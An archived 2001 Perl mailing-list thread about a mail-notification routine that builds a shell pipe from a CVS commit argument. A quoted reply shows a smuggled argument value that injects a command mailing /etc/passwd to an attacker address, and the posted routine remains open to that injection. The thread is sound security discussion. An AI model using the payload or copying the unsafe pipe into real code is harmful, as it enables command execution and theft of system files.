Email Validator RE
The FAQchest
faqchest at abac.com
Sat Nov 17 18:18:14 CST 2001
~sdpm~
Yes, true.
... this is why there is $MLISTAPPL and not simply "mail", as in my
case it's my own SMTP mailer.
as Chris, and you, points out: no IO must be done without controlling
all passed parameters.
I strongly recommend the reading of:
http://www.phrack.org/show.php?p=55&a=7
Luckily, this document that has been out there for quite a while can
still be found.
I wish you good reading.
Thierry
Eugene Tsyrklevich wrote:
>
> ~sdpm~
> and how about
> $ARGV[0] = "oops\" dev\@null.com; mail /etc/passwd me\@badguys.com;\"";
>
> On Fri, Nov 16, 2001 at 11:11:39PM -0800, The FAQchest wrote:
> > Ken, here is an excerpt of a script doing at one time some mail notification.
> >
> > I've adopted a paranoid approach each time I have to deal with system or
> > apps call using an open () command. I enclose the whole routine in an
> > eval{}. If the mail server (MTA) has whatsoever troubles (most of the
> > time network/DNS) and crahes, the calling script doesn't die, just the eval.
> >
> > In more secured scripts, I use an alarm signal to include some timeout
> > control on this IO.
> >
> > You see there are a certain numer of regexp to make sure tha e-mail
> > addresses are ok.
> >
> > Thierry
> >
> >
> >
> > sub clearspaces {
> > return (0) unless (my ($instr) = @_);
> > $instr =~ s,^[ \t\f]+,,;
> > $instr =~ s,[ \t\f\r]+\n$,,;
> > $instr =~ s,[ \t\f]+, ,g;
> > return $instr;
> > }
> >
> > sub mail_notification {
> > print "Trying to mail the commit message ...\n";
> > return (0) unless (my @text = @_);
> >
> > my $emregexp = '([\w-_.]+)@(([\w-_]+[.])+[a-zA-Z]+[ ,]?)';
> > my $subject = &clearspaces ("cvs commit: $ARGV[0]");
> > my $mailto = &clearspaces ($MAIL_TO);
> > $mailto =~ s/[\s]+/,/g;
> > $mailto =~ s,\\,,g;
> > $mailto =~ tr/A-Z/a-z/;
> > return (0) unless ($mailto =~ /^($emregexp)+$/);
> > print " ... Done mailing the message ...\n";
> >
> > eval { # don't let the main apps crashing on this IO
> > open (MAIL, "| $MLISTAPPL -s \"$subject\" $mailto") || return (0);
> > print (MAIL join("\n", @text));
> > close (MAIL);
> > }
> > }
~sdpm~
The posting address is: san-diego-pm-list at hfb.pm.org
List requests should be sent to: majordomo at hfb.pm.org
If you ever want to remove yourself from this mailing list,
you can send mail to <majordomo at happyfunball.pm.org> with the following
command in the body of your email message:
unsubscribe san-diego-pm-list
If you ever need to get in contact with the owner of the list,
(if you have trouble unsubscribing, or have questions about the
list itself) send email to <owner-san-diego-pm-list at happyfunball.pm.org> .
This is the general rule for most mailing lists when you need
to contact a human.
More information about the San-Diego-pm
mailing list